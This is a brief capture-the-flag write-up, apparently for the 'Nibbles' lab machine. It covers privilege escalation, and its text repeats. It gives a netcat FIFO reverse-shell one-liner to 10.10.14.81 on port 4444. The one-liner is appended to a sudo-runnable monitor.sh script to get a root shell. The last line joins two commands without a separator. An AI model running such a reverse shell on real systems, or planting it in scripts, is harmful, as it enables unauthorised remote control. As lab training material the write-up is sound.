Nibbles - Privilege Escalation
April 01, 2024



append this reverse shell to monitor.sh

Then just run the command you will get the reverse connection to your attacker box


Last updated
April 01, 2024



append this reverse shell to monitor.sh

Then just run the command you will get the reverse connection to your attacker box


Last updated
echo 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.81 4444 >/tmp/f' | tee -a monitor.shsudo /home/nibbler/personal/stuff/monitor.sh